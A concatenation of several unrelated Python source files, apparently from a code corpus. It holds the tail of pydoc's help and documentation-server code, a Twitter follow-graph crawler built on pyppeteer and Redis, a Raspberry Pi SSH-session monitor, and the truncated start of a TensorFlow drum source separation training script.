parser.start_td = parser.start_th = lambda a, b=buffer: b.write('\t')
parser.feed(document)
buffer = replace(buffer.getvalue(), '\xa0', ' ', '\n', '\n ')
pager(' ' + strip(buffer) + '\n')
if xrefs:
buffer = StringIO.StringIO()
formatter.DumbWriter(buffer).send_flowing_data(
'Related help topics: ' + join(split(xrefs), ', ') + '\n')
self.output.write('\n%s\n' % buffer.getvalue())
def listmodules(self, key=''):
if key:
self.output.write('''
Here is a list of matching modules. Enter any module name to get more help.
''')
apropos(key)
else:
self.output.write('''
Please wait a moment while I gather a list of all available modules...
''')
modules = {}
def callback(path, modname, desc, modules=modules):
if modname and modname[-9:] == '.__init__':
modname = modname[:-9] + ' (package)'
if find(modname, '.') < 0:
modules[modname] = 1
ModuleScanner().run(callback)
self.list(modules.keys())
self.output.write('''
Enter any module name to get more help. Or, type "modules spam" to search
for modules whose descriptions contain the word "spam".
''')
help = Helper(sys.stdin, sys.stdout)
class Scanner:
"""A generic tree iterator."""
def __init__(self, roots, children, descendp):
self.roots = roots[:]
self.state = []
self.children = children
self.descendp = descendp
def next(self):
if not self.state:
if not self.roots:
return None
root = self.roots.pop(0)
self.state = [(root, self.children(root))]
node, children = self.state[-1]
if not children:
self.state.pop()
return self.next()
child = children.pop(0)
if self.descendp(child):
self.state.append((child, self.children(child)))
return child
class ModuleScanner:
"""An interruptible scanner that searches module synopses."""
def run(self, callback, key=None, completer=None):
if key: key = lower(key)
self.quit = False
seen = {}
for modname in sys.builtin_module_names:
if modname != '__main__':
seen[modname] = 1
if key is None:
callback(None, modname, '')
else:
desc = split(__import__(modname).__doc__ or '', '\n')[0]
if find(lower(modname + ' - ' + desc), key) >= 0:
callback(None, modname, desc)
for importer, modname, ispkg in pkgutil.walk_packages():
if self.quit:
break
if key is None:
callback(None, modname, '')
else:
loader = importer.find_module(modname)
if hasattr(loader,'get_source'):
import StringIO
desc = source_synopsis(
StringIO.StringIO(loader.get_source(modname))
) or ''
if hasattr(loader,'get_filename'):
path = loader.get_filename(modname)
else:
path = None
else:
module = loader.load_module(modname)
desc = (module.__doc__ or '').splitlines()[0]
path = getattr(module,'__file__',None)
if find(lower(modname + ' - ' + desc), key) >= 0:
callback(path, modname, desc)
if completer:
completer()
def apropos(key):
"""Print all the one-line module summaries that contain a substring."""
def callback(path, modname, desc):
if modname[-9:] == '.__init__':
modname = modname[:-9] + ' (package)'
print modname, desc and '- ' + desc
try: import warnings
except ImportError: pass
else: warnings.filterwarnings('ignore') # ignore problems during import
ModuleScanner().run(callback, key)
# --------------------------------------------------- web browser interface
def serve(port, callback=None, completer=None):
import BaseHTTPServer, mimetools, select
# Patch up mimetools.Message so it doesn't break if rfc822 is reloaded.
class Message(mimetools.Message):
def __init__(self, fp, seekable=1):
Message = self.__class__
Message.__bases__[0].__bases__[0].__init__(self, fp, seekable)
self.encodingheader = self.getheader('content-transfer-encoding')
self.typeheader = self.getheader('content-type')
self.parsetype()
self.parseplist()
class DocHandler(BaseHTTPServer.BaseHTTPRequestHandler):
def send_document(self, title, contents):
try:
self.send_response(200)
self.send_header('Content-Type', 'text/html')
self.end_headers()
self.wfile.write(html.page(title, contents))
except IOError: pass
def do_GET(self):
path = self.path
if path[-5:] == '.html': path = path[:-5]
if path[:1] == '/': path = path[1:]
if path and path != '.':
try:
obj = locate(path, forceload=1)
except ErrorDuringImport, value:
self.send_document(path, html.escape(str(value)))
return
if obj:
self.send_document(describe(obj), html.document(obj, path))
else:
self.send_document(path,
'no Python documentation found for %s' % repr(path))
else:
heading = html.heading(
'<big><big><strong>Python: Index of Modules</strong></big></big>',
'#ffffff', '#7799ee')
def bltinlink(name):
return '<a href="%s.html">%s</a>' % (name, name)
names = filter(lambda x: x != '__main__',
sys.builtin_module_names)
contents = html.multicolumn(names, bltinlink)
indices = ['<p>' + html.bigsection(
'Built-in Modules', '#ffffff', '#ee77aa', contents)]
seen = {}
for dir in sys.path:
indices.append(html.index(dir, seen))
contents = heading + join(indices) + '''<p align=right>
<font color="#909090" face="helvetica, arial"><strong>
pydoc</strong> by Ka-Ping Yee <ping@lfw.org></font>'''
self.send_document('Index of Modules', contents)
def log_message(self, *args): pass
class DocServer(BaseHTTPServer.HTTPServer):
def __init__(self, port, callback):
host = (sys.platform == 'mac') and '127.0.0.1' or 'localhost'
self.address = ('', port)
self.url = 'http://%s:%d/' % (host, port)
self.callback = callback
self.base.__init__(self, self.address, self.handler)
def serve_until_quit(self):
import select
self.quit = False
while not self.quit:
rd, wr, ex = select.select([self.socket.fileno()], [], [], 1)
if rd: self.handle_request()
def server_activate(self):
self.base.server_activate(self)
if self.callback: self.callback(self)
DocServer.base = BaseHTTPServer.HTTPServer
DocServer.handler = DocHandler
DocHandler.MessageClass = Message
try:
try:
DocServer(port, callback).serve_until_quit()
except (KeyboardInterrupt, select.error):
pass
finally:
if completer: completer()
# ----------------------------------------------------- graphical interface
def gui():
"""Graphical interface (starts web server and pops up a control window)."""
class GUI:
def __init__(self, window, port=7464):
self.window = window
self.server = None
self.scanner = None
import Tkinter
self.server_frm = Tkinter.Frame(window)
self.title_lbl = Tkinter.Label(self.server_frm,
text='Starting server...\n ')
self.open_btn = Tkinter.Button(self.server_frm,
text='open browser', command=self.open, state='disabled')
self.quit_btn = Tkinter.Button(self.server_frm,
text='quit serving', command=self.quit, state='disabled')
self.search_frm = Tkinter.Frame(window)
self.search_lbl = Tkinter.Label(self.search_frm, text='Search for')
self.search_ent = Tkinter.Entry(self.search_frm)
self.search_ent.bind('<Return>', self.search)
self.stop_btn = Tkinter.Button(self.search_frm,
text='stop', pady=0, command=self.stop, state='disabled')
if sys.platform == 'win32':
# Trying to hide and show this button crashes under Windows.
self.stop_btn.pack(side='right')
self.window.title('pydoc')
self.window.protocol('WM_DELETE_WINDOW', self.quit)
self.title_lbl.pack(side='top', fill='x')
self.open_btn.pack(side='left', fill='x', expand=1)
self.quit_btn.pack(side='right', fill='x', expand=1)
self.server_frm.pack(side='top', fill='x')
self.search_lbl.pack(side='left')
self.search_ent.pack(side='right', fill='x', expand=1)
self.search_frm.pack(side='top', fill='x')
self.search_ent.focus_set()
font = ('helvetica', sys.platform == 'win32' and 8 or 10)
self.result_lst = Tkinter.Listbox(window, font=font, height=6)
self.result_lst.bind('<Button-1>', self.select)
self.result_lst.bind('<Double-Button-1>', self.goto)
self.result_scr = Tkinter.Scrollbar(window,
orient='vertical', command=self.result_lst.yview)
self.result_lst.config(yscrollcommand=self.result_scr.set)
self.result_frm = Tkinter.Frame(window)
self.goto_btn = Tkinter.Button(self.result_frm,
text='go to selected', command=self.goto)
self.hide_btn = Tkinter.Button(self.result_frm,
text='hide results', command=self.hide)
self.goto_btn.pack(side='left', fill='x', expand=1)
self.hide_btn.pack(side='right', fill='x', expand=1)
self.window.update()
self.minwidth = self.window.winfo_width()
self.minheight = self.window.winfo_height()
self.bigminheight = (self.server_frm.winfo_reqheight() +
self.search_frm.winfo_reqheight() +
self.result_lst.winfo_reqheight() +
self.result_frm.winfo_reqheight())
self.bigwidth, self.bigheight = self.minwidth, self.bigminheight
self.expanded = 0
self.window.wm_geometry('%dx%d' % (self.minwidth, self.minheight))
self.window.wm_minsize(self.minwidth, self.minheight)
self.window.tk.willdispatch()
import threading
threading.Thread(
target=serve, args=(port, self.ready, self.quit)).start()
def ready(self, server):
self.server = server
self.title_lbl.config(
text='Python documentation server at\n' + server.url)
self.open_btn.config(state='normal')
self.quit_btn.config(state='normal')
def open(self, event=None, url=None):
url = url or self.server.url
try:
import webbrowser
webbrowser.open(url)
except ImportError: # pre-webbrowser.py compatibility
if sys.platform == 'win32':
os.system('start "%s"' % url)
elif sys.platform == 'mac':
try: import ic
except ImportError: pass
else: ic.launchurl(url)
else:
rc = os.system('netscape -remote "openURL(%s)" &' % url)
if rc: os.system('netscape "%s" &' % url)
def quit(self, event=None):
if self.server:
self.server.quit = 1
self.window.quit()
def search(self, event=None):
key = self.search_ent.get()
self.stop_btn.pack(side='right')
self.stop_btn.config(state='normal')
self.search_lbl.config(text='Searching for "%s"...' % key)
self.search_ent.forget()
self.search_lbl.pack(side='left')
self.result_lst.delete(0, 'end')
self.goto_btn.config(state='disabled')
self.expand()
import threading
if self.scanner:
self.scanner.quit = 1
self.scanner = ModuleScanner()
threading.Thread(target=self.scanner.run,
args=(self.update, key, self.done)).start()
def update(self, path, modname, desc):
if modname[-9:] == '.__init__':
modname = modname[:-9] + ' (package)'
self.result_lst.insert('end',
modname + ' - ' + (desc or '(no description)'))
def stop(self, event=None):
if self.scanner:
self.scanner.quit = 1
self.scanner = None
def done(self):
self.scanner = None
self.search_lbl.config(text='Search for')
self.search_lbl.pack(side='left')
self.search_ent.pack(side='right', fill='x', expand=1)
if sys.platform != 'win32': self.stop_btn.forget()
self.stop_btn.config(state='disabled')
def select(self, event=None):
self.goto_btn.config(state='normal')
def goto(self, event=None):
selection = self.result_lst.curselection()
if selection:
modname = split(self.result_lst.get(selection[0]))[0]
self.open(url=self.server.url + modname + '.html')
def collapse(self):
if not self.expanded: return
self.result_frm.forget()
self.result_scr.forget()
self.result_lst.forget()
self.bigwidth = self.window.winfo_width()
self.bigheight = self.window.winfo_height()
self.window.wm_geometry('%dx%d' % (self.minwidth, self.minheight))
self.window.wm_minsize(self.minwidth, self.minheight)
self.expanded = 0
def expand(self):
if self.expanded: return
self.result_frm.pack(side='bottom', fill='x')
self.result_scr.pack(side='right', fill='y')
self.result_lst.pack(side='top', fill='both', expand=1)
self.window.wm_geometry('%dx%d' % (self.bigwidth, self.bigheight))
self.window.wm_minsize(self.minwidth, self.bigminheight)
self.expanded = 1
def hide(self, event=None):
self.stop()
self.collapse()
import Tkinter
try:
root = Tkinter.Tk()
# Tk will crash if pythonw.exe has an XP .manifest
# file and the root has is not destroyed explicitly.
# If the problem is ever fixed in Tk, the explicit
# destroy can go.
try:
gui = GUI(root)
root.mainloop()
finally:
root.destroy()
except KeyboardInterrupt:
pass
# -------------------------------------------------- command-line interface
def ispath(x):
return isinstance(x, str) and find(x, os.sep) >= 0
def cli():
"""Command-line interface (looks at sys.argv to decide what to do)."""
import getopt
class BadUsage: pass
# Scripts don't get the current directory in their path by default.
scriptdir = os.path.dirname(sys.argv[0])
if scriptdir in sys.path:
sys.path.remove(scriptdir)
sys.path.insert(0, '.')
try:
opts, args = getopt.getopt(sys.argv[1:], 'gk:p:w')
writing = 0
for opt, val in opts:
if opt == '-g':
gui()
return
if opt == '-k':
apropos(val)
return
if opt == '-p':
try:
port = int(val)
except ValueError:
raise BadUsage
def ready(server):
print 'pydoc server ready at %s' % server.url
def stopped():
print 'pydoc server stopped'
serve(port, ready, stopped)
return
if opt == '-w':
writing = 1
if not args: raise BadUsage
for arg in args:
if ispath(arg) and not os.path.exists(arg):
print 'file %r does not exist' % arg
break
try:
if ispath(arg) and os.path.isfile(arg):
arg = importfile(arg)
if writing:
if ispath(arg) and os.path.isdir(arg):
writedocs(arg)
else:
writedoc(arg)
else:
help.help(arg)
except ErrorDuringImport, value:
print value
except (getopt.error, BadUsage):
cmd = os.path.basename(sys.argv[0])
print """pydoc - the Python documentation tool
%s <name> ...
Show text documentation on something. <name> may be the name of a
Python keyword, topic, function, module, or package, or a dotted
reference to a class or function within a module or module in a
package. If <name> contains a '%s', it is used as the path to a
Python source file to document. If name is 'keywords', 'topics',
or 'modules', a listing of these things is displayed.
%s -k <keyword>
Search for a keyword in the synopsis lines of all available modules.
%s -p <port>
Start an HTTP server on the given port on the local machine.
%s -g
Pop up a graphical interface for finding and serving documentation.
%s -w <name> ...
Write out the HTML documentation for a module to a file in the current
directory. If <name> contains a '%s', it is treated as a filename; if
it names a directory, documentation is written for all the contents.
""" % (cmd, os.sep, cmd, cmd, cmd, cmd, os.sep)
if __name__ == '__main__': cli()
|
twitographer.py | # twitographer.py -- a parallelized web crawler to traverse the twitter graph
# matthew jack <{username}@uiowa.edu>
import os
import sys
import time
import json
import redis
import signal
import asyncio
import logging
import credentials
import multiprocessing as mp
from pyppeteer import launch
class Logger:
def __init__(self):
self.logger = logging.basicConfig(format='%(asctime)s \033[31;1m'+str(os.getpid())+'\033[0m: %(message)s', level=logging.INFO, datefmt='%H:%M:%S')
def log(self, msg, level='info'):
if level == 'info':
logging.info(msg)
elif level == 'warn':
logging.warning(msg)
class Crawler:
async def login(self, creds):
username_selector = ".js-username-field"
password_selector = ".js-password-field"
login_selector = "button.submit"
url = "https://twitter.com/login"
browser = await launch({"headless": False})
self.page = await browser.newPage()
await self.page.goto(url)
await self.page.waitForSelector(username_selector)
await self.page.click(username_selector)
await self.page.keyboard.type(creds['username'])
await self.page.click(password_selector)
await self.page.keyboard.type(creds['password'])
await self.page.click(login_selector)
await self.page.waitForSelector('.Icon--notifications')
async def crawl(self, user):
scroll_delay = 500
# await self.page.waitFor(scroll_delay)
try:
await self.page.goto('https://twitter.com/'+user+'/following')
except:
return False
try:
await self.page.waitForSelector('div.GridTimeline-items > div.Grid--withGutter')
except:
return False
# await self.page.waitFor(200)
valid = await self.is_page_valid()
if valid == False:
return False
follows = {}
scrolls = 0
while True and self.page:
if scrolls == 0:
previous_height = 0
else:
previous_height = await self.page.evaluate('document.body.scrollHeight')
follows = await self.extract_items(user)
await self.page.evaluate('window.scrollTo(0, document.body.scrollHeight)')
await self.page.waitFor(scroll_delay)
new_height = await self.page.evaluate('document.body.scrollHeight')
scrolls += 1
if previous_height == new_height:
break
return follows
async def is_page_valid(self):
# check for too many followers
follower_count = await self.page.querySelector('a[data-nav="following"] > span.ProfileNav-value')
follower_count = await self.page.evaluate('(element) => element.getAttribute("data-count")', follower_count)
if int(follower_count) > 1000:
return False
# account locked?
protected = await self.page.querySelector('div.ProtectedTimeline')
if protected:
return False
# no follows?
empty = await self.page.querySelector('div.GridTimeline-emptyText')
empty = await self.page.evaluate('(element) => element.getAttribute("display")', empty)
if empty == 'none':
return False
return True
async def extract_items(self, user):
follows = []
extracted_elements = await self.page.querySelectorAll('div.ProfileCard')
for element in extracted_elements:
try:
follow_screen_name = await self.page.evaluate('(element) => element.getAttribute("data-screen-name")', element)
except:
print("error in extract_items, skipping to next page")
return ''
if follow_screen_name == user:
continue
follow_user_id = await self.page.evaluate('(element) => element.getAttribute("data-user-id")', element)
follows.append(follow_screen_name)
return follows
class Recorder:
def __init__(self):
self.r = redis.StrictRedis(host='localhost', port=6379, db=0)
def save_graph(self, user, follows):
for x in follows:
self.r.sadd('graph:'+user, x)
self.r.sadd('parsed_users', user)
def add_to_queue(self, list):
if(len(list) > 0):
self.r.sadd('queue', *list)
def save_duplicates(self, list):
if(len(list) > 0):
self.r.rpush('duplicates', *list)
def skip_user(self, user):
self.r.rpush('skipped', user)
def set_in_progress(self, user):
self.r.sadd('in_progress', user)
def resolve_in_progress(self, user):
self.r.srem('in_progress', user)
def resume_in_progress(self):
self.r.spop('in_progress')
class Cartographer:
def __init__(self):
signal.signal(signal.SIGINT, self.catch_interrupt)
self.recorder = Recorder()
self.logger = Logger()
def process_follows(self, user, follows):
duplicates = []
self.recorder.save_graph(user, follows)
duplicates = self.deduplicate_follows(user, follows)
self.recorder.add_to_queue(follows)
self.recorder.save_duplicates(duplicates)
print('=================================================================================================================')
self.logger.log('@'+user+' follows '+str(len(follows))+' accounts; found '+str(len(duplicates))+' duplicates; adding '+str(len(follows) - len(duplicates))+' accounts to queue.')
self.logger.log('The queue has '+str(self.recorder.r.scard('queue'))+' accounts; we\'ve explored '+str(self.recorder.r.scard('parsed_users'))+' nodes so far.')
print('=================================================================================================================')
def deduplicate_follows(self, user, follows):
duplicates = self.recorder.r.sinter('graph:'+user, 'parsed_users')
return duplicates
def catch_interrupt(self, sig_num, stack_frame):
self.logger.log('Caught exit signal')
self.logger.log('Flushing data to db...')
self.recorder.r.save()
self.logger.log('Exiting')
sys.exit(0)
return
async def Conductor(creds):
crawler = Crawler()
await crawler.login(creds)
cartographer = Cartographer()
while True:
if cartographer.recorder.r.scard('queue') <= 0:
time.sleep(60)
if cartographer.recorder.r.scard('queue') <= 0:
cartographer.logger.log('Graph traversed')
cartographer.recorder.r.save()
return
user = cartographer.recorder.r.spop('queue')
user = user.decode("utf-8") # spop returns bytes b'key
cartographer.recorder.set_in_progress(user)
cartographer.logger.log('Crawling @'+user+'...')
follows = await crawler.crawl(user)
if follows == False:
cartographer.logger.log('====== Skipping @'+user+'; either the user follows too many accounts or we can\'t see the page ======')
cartographer.recorder.skip_user(user)
else:
cartographer.process_follows(user, follows)
cartographer.recorder.resolve_in_progress(user)
def initialize_queue():
if len(sys.argv) >= 2:
entry_point = str(sys.argv[1])
else:
entry_point = 'dril'
r = redis.StrictRedis(host='localhost', port=6379, db=0)
resume = r.spop('in_progress')
if resume:
r.sadd('queue', resume)
while True:
resume = r.spop('in_progress')
if resume:
r.sadd('queue', resume)
else:
break
elif r.scard('queue') == 0:
r.sadd('queue', entry_point)
r = None
def Manager(creds):
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
loop.run_until_complete(Conductor(creds))
if __name__ == "__main__":
initialize_queue()
cred_list = credentials.creds
if len(cred_list) <= mp.cpu_count():
size = len(cred_list)
else:
size = mp.cpu_count
print('Spawning '+str(size)+' processes...')
jobs = []
for _ in range(size):
cred = cred_list.pop()
job = mp.Process(target=Manager, args=(cred,))
jobs.append(job)
for j in jobs:
j.start()
for j in jobs:
j.join()
|
ssh-monitor.py | from multiprocessing import Process
import RPi.GPIO as GPIO
import time
import subprocess
import psutil
GPIO.setmode(GPIO.BCM)
ledPin = 17
buttonPin = 18
GPIO.setup(buttonPin, GPIO.IN, pull_up_down=GPIO.PUD_UP)
GPIO.setup(ledPin, GPIO.OUT)
GPIO.output(ledPin, GPIO.LOW)
def buttonCheck():
while True:
input_state = GPIO.input(18)
if input_state == False:
print('button pressed')
# get the list of pids for SSH sessions on loopback
users = psutil.users()
for user in users:
if '127.0.0.1' in str(user.host):
subprocess.run(['kill', '-9', str(user.pid)])
time.sleep(0.25)
def sshCheck():
while True:
detected = False
users = psutil.users()
for user in users:
if '127.0.0.1' in str(user.host):
detected = True
if detected:
GPIO.output(ledPin, GPIO.HIGH)
else:
GPIO.output(ledPin, GPIO.LOW)
time.sleep(0.25)
if __name__ == '__main__':
Process(target=buttonCheck).start()
Process(target=sshCheck).start()
|
Training.py | from sacred import Experiment
import tensorflow as tf
import threading
import numpy as np
import os
import multiprocessing
import Datasets
from Input import Input as Input
from Input import batchgenerators as batchgen
import Models.WGAN_Critic
import Models.Unet
import Utils
import cPickle as pickle
import Test
import logging
logger = multiprocessing.log_to_stderr()
logger.setLevel(logging.DEBUG)
logger.warning('-----wtf?------')
# logger = logging.getLogger('scope.name')
#
# file_log_handler = logging.FileHandler('logfile.log')
# logger.addHandler(file_log_handler)
#
# stderr_log_handler = logging.StreamHandler()
# logger.addHandler(stderr_log_handler)
#
# # nice output format
# formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
# file_log_handler.setFormatter(formatter)
# stderr_log_handler.setFormatter(formatter)
#
# logger.info('Info message')
# logger.error('Error message')
# logger.setLevel('DEBUG')
ex = Experiment('Drum_Source_Separation')
experiment_id = 555 #np.random.randint(0, 10000)
@ex.config
def cfg():
model_config = {"model_base_dir" : "checkpoints", # Base folder for model checkpoints
"log_dir" : "logs", # Base folder for logs files
"batch_size" : 32, # Batch size !!!64!!
"alpha" : 0.001, # Weighting for adversarial loss (unsupervised)
"beta" : 0.001, # Weighting for additive penalty (unsupervised)
"lam" : 10, # Weighting term lambda for WGAN gradient penalty
"init_disc_lr" : 5e-5, # Discriminator(s) learning rate
"init_sup_sep_lr" : 5e-5, # Supervised separator learning rate
"init_unsup_sep_lr" : 5e-5, # Unsupervised separator learning rate
"epoch_it" : 1000, # Number of supervised separator steps per epoch
"num_disc": 5, # Number of discriminator iterations per separator update
"num_frames" : 128, # DESIRED number of time frames in the spectrogram per sample (this can be increased when using U-net due to its limited output sizes)
"num_fft" : 512, # FFT Size
"num_hop" : 256, # FFT Hop size
'expected_sr' : 16384, # Downsample all audio input to this sampling rate
'mono_downmix' : True, # Whether to downsample the audio input
'cache_size' : 72, # was 64 Number of audio excerpts that are cached to build batches from !!!64!!
'num_workers' : 4, # was 4 Number of processes reading audio and filling up the cache
"duration" : 5, # Duration in seconds of the audio excerpts in the cache (excluding input context)
'min_replacement_rate' : .3, # roughly: how many cache entries to replace at least per batch on average. Can be fractional
'num_layers' : 4, # How many U-Net layers
}
experiment_id = 555
@ex.capture
def test(model_config, audio_list, model_folder, load_model):
# Determine input and output shapes, if we use U-net as separator
freq_bins = model_config["num_fft"] / 2 + 1 # Make even number of freq bins
disc_input_shape = [model_config["batch_size"], freq_bins-1, model_config["num_frames"],1] # Shape of discriminator input
separator_class = Models.Unet.Unet(model_config["num_layers"])
sep_input_shape, sep_output_shape = separator_class.getUnetPadding(np.array(disc_input_shape))
separator_func = separator_class.get_output
# Placeholders and input normalisation
input_ph, queue, [mix_context, acc, drums] = Input.get_multitrack_input(sep_output_shape[1:], model_config["batch_size"], name="input_batch", input_shape=sep_input_shape[1:])
enqueue_op = queue.enqueue(input_ph)
mix = Input.crop(mix_context, sep_output_shape)
mix_norm, mix_context_norm, acc_norm, drum_norm = Input.norm(mix), Input.norm(mix_context), Input.norm(acc), Input.norm(drums)
print("Testing...")
# BUILD MODELS
# Separator
separator_acc_norm, separator_drums_norm = separator_func(mix_context_norm, reuse=False)
# Supervised objective
sup_separator_loss = tf.reduce_mean(tf.square(separator_drums_norm - drum_norm)) + tf.reduce_mean(tf.square(separator_acc_norm - acc_norm))
tf.summary.scalar("sup_sep_loss", sup_separator_loss, collections=['sup', 'unsup'])
global_step = tf.get_variable('global_step', [], initializer=tf.constant_initializer(0), trainable=False, dtype=tf.int64)
# Start session and queue input threads
sess = tf.Session()
sess.run(tf.global_variables_initializer())
writer = tf.summary.FileWriter(model_config["log_dir"] + os.path.sep + model_folder, graph=sess.graph)
thread = threading.Thread(target=Input.load_and_enqueue, args=(sess, model_config, queue, enqueue_op, input_ph, audio_list))
thread.deamon = True
thread.start()
# CHECKPOINTING
# Load pretrained model to test
restorer = tf.train.Saver(tf.global_variables(), write_version=tf.train.SaverDef.V2)
print("Num of variables" + str(len(tf.global_variables())))
restorer.restore(sess, load_model)
print('Pre-trained model restored for testing')
# Start training loop
_global_step = sess.run(global_step)
print("Starting!")
batches = 0
total_loss = 0.0
run = True
while run:
try:
_sup_separator_loss = sess.run(
sup_separator_loss)
total_loss += _sup_separator_loss # Aggregate loss measure
batches += 1
except Exception as e:
print("Emptied queue - finished this epoch!")
run = False
mean_mse_loss = total_loss / float(batches)
summary = tf.Summary(value=[tf.Summary.Value(tag="test_loss", simple_value=mean_mse_loss)])
writer.add_summary(summary, global_step=_global_step)
writer.flush()
writer.close()
print("Finished testing - Mean MSE: " + str(mean_mse_loss))
thread.join()
# Close session, clear computational graph
sess.close()
tf.reset_default_graph()
return mean_mse_loss
@ex.capture
def train(model_config, sup_dataset, model_folder, unsup_dataset=None, load_model=None):
# Determine input and output shapes
freq_bins = model_config["num_fft"] / 2 + 1 # Make even number of freq bins
disc_input_shape = [model_config["batch_size"], freq_bins - 1, model_config["num_frames"],1] # Shape of discriminator input
separator_class = Models.Unet.Unet(model_config["num_layers"])
sep_input_shape, sep_output_shape = separator_class.getUnetPadding(np.array(disc_input_shape))
separator_func = separator_class.get_output
# Batch input workers
# Creating the batch generators
padding_durations = [float(sep_input_shape[2] - sep_output_shape[2]) * model_config["num_hop"] / model_config["expected_sr"] / 2.0, 0, 0] # Input context that the input audio has to be padded with while reading audio files
sup_batch_gen = batchgen.BatchGen_Paired(
model_config,
sup_dataset,
sep_input_shape,
sep_output_shape,
padding_durations[0]
)
# Creating unsupervised batch generator if needed
if unsup_dataset is not None:
unsup_batch_gens = list()
for i in range(3):
shape = (sep_input_shape if i==0 else sep_output_shape)
unsup_batch_gens.append(batchgen.BatchGen_Single(
model_config,
unsup_dataset[i],
shape,
padding_durations[i]
))
print("Starting worker")
sup_batch_gen.start_workers()
print("Started worker!")
if unsup_dataset is not None:
for gen in unsup_batch_gens:
print("Starting worker")
gen.start_workers()
print("Started worker!")
# Placeholders and input normalisation
mix_context,acc,drums = Input.get_multitrack_placeholders(sep_output_shape, sep_input_shape, "sup")
mix = Input.crop(mix_context, sep_output_shape)
mix_norm, mix_context_norm, acc_norm, drums_norm = Input.norm(mix), Input.norm(mix_context), Input.norm(acc), Input.norm(drums)
if unsup_dataset is not None:
mix_context_u,acc_u,drums_u = Input.get_multitrack_placeholders(sep_output_shape, sep_input_shape, "unsup")
mix_u = Input.crop(mix_context_u, sep_output_shape)
mix_norm_u, mix_context_norm_u, acc_norm_u, drums_norm_u = Input.norm(mix_u), Input.norm(mix_context_u), Input.norm(acc_u), Input.norm(drums_u)
print("Training...")
# BUILD MODELS
# Separator
separator_acc_norm, separator_drums_norm = separator_func(mix_context_norm, reuse=False)
separator_acc, separator_drums = Input.denorm(separator_acc_norm), Input.denorm(separator_drums_norm)
if unsup_dataset is not None:
separator_acc_norm_u, separator_drums_norm_u = separator_func(mix_context_norm_u, reuse=True)
separator_acc_u, separator_drums_u = Input.denorm(separator_acc_norm_u), Input.denorm(separator_drums_norm_u)
mask_loss_u = tf.reduce_mean(tf.square(mix_u - separator_acc_u - separator_drums_u))
mask_loss = tf.reduce_mean(tf.square(mix - separator_acc - separator_drums))
# SUMMARIES FOR INPUT AND SEPARATOR
tf.summary.scalar("mask_loss", mask_loss, collections=["sup", "unsup"])
if unsup_dataset is not None:
tf.summary.scalar("mask_loss_u", mask_loss_u, collections=["unsup"])
tf.summary.scalar("acc_norm_mean_u", tf.reduce_mean(acc_norm_u), collections=["acc_disc"])
tf.summary.scalar("drums_norm_mean_u", tf.reduce_mean(drums_norm_u), collections=["drums_disc"])
tf.summary.scalar("acc_sep_norm_mean_u", tf.reduce_mean(separator_acc_norm_u), collections=["acc_disc"])
tf.summary.scalar("drums_sep_norm_mean_u", tf.reduce_mean(separator_drums_norm_u), collections=["drums_disc"])
tf.summary.scalar("acc_norm_mean", tf.reduce_mean(acc_norm), collections=['sup'])
tf.summary.scalar("drums_norm_mean", tf.reduce_mean(drums_norm), collections=['sup'])
tf.summary.scalar("acc_sep_norm_mean", tf.reduce_mean(separator_acc_norm), collections=['sup'])
tf.summary.scalar("drums_sep_norm_mean", tf.reduce_mean(separator_drums_norm), collections=['sup'])
tf.summary.image("sep_acc_norm", separator_acc_norm, collections=["sup", "unsup"])
tf.summary.image("sep_drums_norm", separator_drums_norm, collections=["sup", "unsup"])
# BUILD DISCRIMINATORS, if unsupervised training
unsup_separator_loss = 0
if unsup_dataset is not None:
disc_func = Models.WGAN_Critic.dcgan
# Define real and fake inputs for both discriminators - if separator output and dsicriminator input shapes do not fit perfectly, we will do a centre crop and only discriminate that part
acc_real_input = Input.crop(acc_norm_u, disc_input_shape)
acc_fake_input = Input.crop(separator_acc_norm_u, disc_input_shape)
drums_real_input = Input.crop(drums_norm_u, disc_input_shape)
drums_fake_input = Input.crop(separator_drums_norm_u, disc_input_shape)
#WGAN
acc_disc_loss, acc_disc_real, acc_disc_fake, acc_grad_pen, acc_wasserstein_dist = \
Models.WGAN_Critic.create_critic(model_config, real_input=acc_real_input, fake_input=acc_fake_input, scope="acc_disc", network_func=disc_func)
drums_disc_loss, drums_disc_real, drums_disc_fake, drums_grad_pen, drums_wasserstein_dist = \
Models.WGAN_Critic.create_critic(model_config, real_input=drums_real_input, fake_input=drums_fake_input, scope="drums_disc", network_func=disc_func)
L_u = - tf.reduce_mean(drums_disc_fake) - tf.reduce_mean(acc_disc_fake) # WGAN based loss for separator (L_u in paper)
unsup_separator_loss = model_config["alpha"] * L_u + model_config["beta"] * mask_loss_u # Unsupervised loss for separator: WGAN-based loss L_u and additive penalty term (mask loss), weighted by alpha and beta (hyperparameters)
# Supervised objective: MSE in log-normalized magnitude space
sup_separator_loss = tf.reduce_mean(tf.square(separator_drums_norm - drums_norm)) + \
tf.reduce_mean(tf.square(separator_acc_norm - acc_norm))
separator_loss = sup_separator_loss + unsup_separator_loss # Total separator loss: Supervised + unsupervised loss
# TRAINING CONTROL VARIABLES
global_step = tf.get_variable('global_step', [],
initializer=tf.constant_initializer(0), trainable=False, dtype=tf.int64)
increment_global_step = tf.assign(global_step, global_step + 1)
disc_lr = tf.get_variable('disc_lr', [],
initializer=tf.constant_initializer(model_config["init_disc_lr"], dtype=tf.float32), trainable=False)
unsup_sep_lr = tf.get_variable('unsup_sep_lr', [],
initializer=tf.constant_initializer(model_config["init_unsup_sep_lr"], dtype=tf.float32), trainable=False)
sup_sep_lr = tf.get_variable('sup_sep_lr', [],
initializer=tf.constant_initializer(model_config["init_sup_sep_lr"], dtype=tf.float32),
trainable=False)
# Set up optimizers
separator_vars = Utils.getTrainableVariables("separator")
print("Sep_Vars: " + str(Utils.getNumParams(separator_vars)))
acc_disc_vars, drums_disc_vars = Utils.getTrainableVariables("acc_disc"), Utils.getTrainableVariables("drums_disc")
print("Drums_Disc_Vars: " + str(Utils.getNumParams(drums_disc_vars)))
print("Acc_Disc_Vars: " + str(Utils.getNumParams(acc_disc_vars)))
if unsup_dataset is not None:
with tf.variable_scope("drums_disc_solver"):
drums_disc_solver = tf.train.AdamOptimizer(learning_rate=disc_lr).minimize(drums_disc_loss, var_list=drums_disc_vars, colocate_gradients_with_ops=True)
with tf.variable_scope("acc_disc_solver"):
acc_disc_solver = tf.train.AdamOptimizer(learning_rate=disc_lr).minimize(acc_disc_loss, var_list=acc_disc_vars, colocate_gradients_with_ops=True)
with tf.variable_scope("unsup_separator_solver"):
unsup_separator_solver = tf.train.AdamOptimizer(learning_rate=unsup_sep_lr).minimize(
